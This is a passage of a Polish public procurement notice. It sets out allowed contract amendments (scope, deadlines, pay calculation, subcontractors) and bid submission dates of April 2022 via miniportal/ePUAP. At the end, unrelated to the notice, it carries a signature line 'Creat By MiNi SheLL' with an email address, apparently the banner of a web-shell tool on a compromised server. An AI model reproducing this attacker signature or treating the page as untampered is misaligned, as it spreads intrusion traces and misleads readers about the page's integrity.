powodującej, że:<br/>a)	wykonanie części zakresu nie leży w interesie publicznym;<br/>b)	wykonanie części zakresu nie jest możliwe, z przyczyn nieleżących po stronie Zam. i Wykonawcy (Wyk.);<br/>c)	wykonanie części zakresu utraciło zasadność realizacji dla Zam,<br/>d)	zmniejszenie zakresu nie przekracza 15% wartości zamówienia.<br/>3)	terminów reali. – Zam. przewiduje możliwość zmiany terminu wykonania UM:<br/>a)	jeśli pojawiły się okol. natury obiektywnej, których nie można było przewidzieć w chwili zawierania UM;<br/>b)	jeśli wystąpiła konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich;<br/>c)	jeśli dotrzymanie terminu okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wyk.;<br/>d)	jeśli w toku realizacji UM pojawiła się konieczność wykonania robót lub prac nieprzewidzianych w Dok. tech.;<br/>e)	w przypadku wystąpienia niekorzystnych warunków atmosf.;<br/>f)	w przypadku wystąpienia anomalii pogodowych;<br/>g)	w przypadku wstrzymania realizacji inwestycji objętej UM przez Zam. na skutek okoli. nieleżących po stronie Wyk.;<br/>h)	skrócenie terminu realizacji za zgodą Zam.;<br/>i)	w przypadku zawieszenia robót przez organy nadzoru bud. z przyczyn niezależnych od Wyk.;<br/>4)	zmiany wynagrodzenia w zakresie:<br/>a)	zmiany podatku VAT,<br/>b)	zmniejszenia wynagr. , zwłaszcza w sytuacji zmniejszenia zakresu realizacji robót Sposób obliczenia należytego wynagr. Wyk. z tytułu wystąpienia robót zaniechanych będzie następujący:<br/>	w przypadku odstąpienia od całego elementu robót okr. w harmonogramie nastąpi odliczenie wartości tego elementu,<br/>	w przypadku odstąpienia od części robót, obliczenie wartości zaniechanych robót nastąpi na podstawie kosztorysów złożonych przez Wyk. przed podpisaniem niniejszej UM,<br/>	w przypadku, gdy nie będzie możliwe rozliczenie danej roboty w oparciu o w/w zapisy, brakujące ceny czynników produkcji zostaną przyjęte z zeszytów SEKOCENBUD<br/>	podstawą do określenia nakładów rzeczowych będą KNR-y, a następnie wycena indywidualna Wyk. zatwierdzona przez Zam.;<br/>c)	zwiększenia wynagrodzenia Wyk. w przypadku wprowadzenia robót dodatkowych. Wyliczenie wartości robót dodatkowych nastąpi w oparciu o poniższe założenia:<br/> ceny jednostkowe robót będą przyjmowane z kosztorysu złożonego przez Wyk. przed podpisaniem niniejszej umowy,<br/>	w przypadku, gdy wystąpią roboty, na które nie określono w kosztorysie cen jednostkowych, wartość ich zostanie wyliczona w oparciu o poniższe założenia: <br/>•	ceny czynników produkcji (R, M, S, Ko, Z) zostaną przyjęte z kosztorysów opracowanych przez Wyk. metodą kalkulacji szczegółowej;<br/>•	brakujące ceny czynników produkcji zostaną przyjęte z zeszytów SEKOCENBUD (jako średnie) za okres ich wbudowania;<br/>•	podstawą do określenia nakładów rzeczowych będą normy zawarte w wyżej wskazanych kosztorysach, odpowiednie pozycje Katalogów Nakładów Rzeczowych (KNR) Katalogi Norm Nakładów Rzeczowych, wycena indywidualna Wyk.,<br/>d)	zmiany o których mowa w ust. 3 pkt 4) ppkt b) oraz c) niniejszego paragrafu nie mogą spowodować zmiany łącznej wartości zamówienia przekraczającej 15% wartości pierwotnej umowy oraz nie mogą spowodować zmiany ogólnego charakteru umowy.<br/>5)	zmiany podwykonawców, zgodnie z zasadami przewidzianymi w ustawie Pzp,;<br/>6)	wystąpienia zmian będących następstwem okoliczności leżących po stronie Zam.;<br/>7)	wszelkich zmian, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa;<br/>8)	zmian, których wprowadzenie wynika z zaistnienia siły wyższej; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez system https://miniportal.uzp.gov.pl poprzez Formularz do komunikacji -&gt; Formularz do złożenia, zmiany, wycofania oferty lub wniosku” dostępnych na platformie ePUAP (system miniportal.gov.pl po wybraniu formularzu do komunikacji automatycznie przekierowuje na platformę ePUAP)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com